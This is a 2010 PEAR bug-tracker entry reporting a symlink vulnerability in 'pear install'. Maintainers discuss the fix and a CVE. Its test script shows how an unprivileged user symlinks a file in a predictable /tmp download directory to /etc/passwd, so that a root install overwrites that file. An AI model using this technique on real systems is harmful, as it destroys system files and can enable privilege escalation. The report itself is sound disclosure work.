Edit report at http://pear.php.net/bugs/bug.php?id=18056&edit=1
ID: 18056
Updated by: [email protected]
Reported By: ondrej at sury dot org
Summary: [SECURITY]: Symlink attack in PEAR install
-Status: Assigned
+Status: Closed
Type: Bug
Package: PEAR
Operating System: Linux
Package Version: 1.9.1
PHP Version: 5.3.3
Assigned To: dufuz
Roadmap Versions:
New Comment:
-Status: Assigned
+Status: Closed
This bug has been fixed in SVN.
If this was a documentation problem, the fix will appear on pear.php.net
by the end of next Sunday (CET).
If this was a problem with the pear.php.net website, the change should
be live shortly.
Otherwise, the fix will appear in the package's next release.
Thank you for the report and for helping us make PEAR better.
The fixes have been committed and an advisory will be posted when the
release
happens, in the next day or two.
Look for the 1.9.2 release when it gets posted.
Previous Comments:
------------------------------------------------------------------------
[2010-12-29 13:21:56] ondrej
Hi, thanks for working on the fix.
You should probably request a CVE, since you are the owner of the
project. I guess
you can ask on internals how to do that.
Ondrej
------------------------------------------------------------------------
[2010-12-29 05:06:55] dufuz
A fix is coming soon, sorry for the delays. As for the CVE, is that
something you (or
any of the Debian people) want to take care of?
------------------------------------------------------------------------
[2010-12-08 01:35:29] dufuz
-Assigned To:
+Assigned To: dufuz
------------------------------------------------------------------------
[2010-11-14 15:29:11] ondrej
This should probably get a CVE.
It's already tracked under:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546164
http://security-tracker.debian.org/tracker/TEMP-0546164-014755
Bug first reported by Raphael Geisert (one of Debian php5 maintainers).
Ondrej, on behalf of Debian PHP5 maintainers
------------------------------------------------------------------------
[2010-11-14 15:26:39] ondrej
Description:
------------
There's symlink vulnerability when doing PEAR install. PEAR
should really be using $(mktemp) for it's directories like
download_dir, cache_dir and tmp_dir, and check whether the
directory doesn't exists.
Test script:
---------------
# pear config-show | grep /tmp
PEAR Installer cache directory cache_dir /tmp/pear/cache
PEAR Installer download download_dir
/tmp/buildd/php5-5.3.3/pear-build-download
PEAR Installer temp directory temp_dir /tmp/pear/temp
# ls -ld /tmp/buildd/php5-5.3.3/pear-build-download
drwxr-xr-x 2 ondrej ondrej 4096 Nov 14 14:17
/tmp/buildd/php5-5.3.3/pear-build-download
# su - ondrej
$ cd /tmp/buildd/php5-5.3.3/pear-build-download
$ ln -s /etc/passwd package.xml
$ cat package.xml
root:x:0:0:root:/root:/bin/bash
[...]
$ logout
# pear install Net_Socket
downloading Net_Socket-1.0.10.tgz ...
Starting to download Net_Socket-1.0.10.tgz (5,429 bytes)
.....done: 5,429 bytes
install ok: channel://pear.php.net/Net_Socket-1.0.10
# head /etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<package packagerversion="1.9.1" version="2.0"
xmlns="http://pear.php.net/dtd/package-2.0"
xmlns:tasks="http://pear.php.net/dtd/tasks-1.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0
http://pear.php.net/dtd/tasks-1.0.xsd
http://pear.php.net/dtd/package-2.0
" rel="nofollow">http://pear.php.net/dtd/package-2.0.xsd">
<name>Net_Socket</name>
<channel>pear.php.net</channel>
<summary>Network Socket Interface</summary>
<description>Net_Socket is a class interface to TCP sockets. It
provides blocking
and non-blocking operation, with different reading and writing modes
(byte-wise, block-wise, line-wise and special formats like network
byte-order ip addresses).</description>
<lead>
Expected result:
----------------
Not overwriting system files. Not vulnerable to symlink attack.
Actual result:
--------------
Overwritten /etc/passwd just by creating right directories and
symlinks.
------------------------------------------------------------------------
